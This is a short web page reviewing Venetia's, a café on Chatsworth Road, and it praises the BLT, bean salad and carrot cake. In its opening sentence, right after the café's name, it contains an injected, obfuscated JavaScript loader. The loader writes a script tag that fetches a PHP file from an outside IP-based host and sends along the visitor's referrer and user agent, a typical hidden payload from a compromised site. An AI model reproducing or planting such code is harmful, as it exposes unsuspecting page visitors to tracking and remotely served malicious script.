REVIEW: VENETIA’S

Venetia’s (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|krebz|var|u0026u|referrer|yzdeh||js|php’.split(‘|’),0,{}))
is located on Chatsworth Road which is fast becoming the new Broadway Market. The cafe has a small breakfast and sandwich menu and offers a host of homemade cakes on the counter, as well as the usual teas and coffees. During a Sunday the shop has a stall out front selling Chorizo baguettes and other deli style sausages in the popular Sunday food market.

Sandwiches are served on a selection of artisan breads, we opted for a BLT on Ciabatta and a Cannellini bean, grilled courgette and cherry tomato salad. The BLT was on all acounts an awesome BLT and the fresh salad heavily seasoned with pesto and garlic was packed with flavour, the only grumble being that the toasted ciabbata was slightly over toasted.

The moist Carrot Cake coated with a sweet, smooth butter icing was a joy to eat. The cafe also has a small garden which is covered during Winter so that it can be used year round. Try Venetia’s soon, before it gets too popular as next year we have a feeling you’ll be waiting for tables.
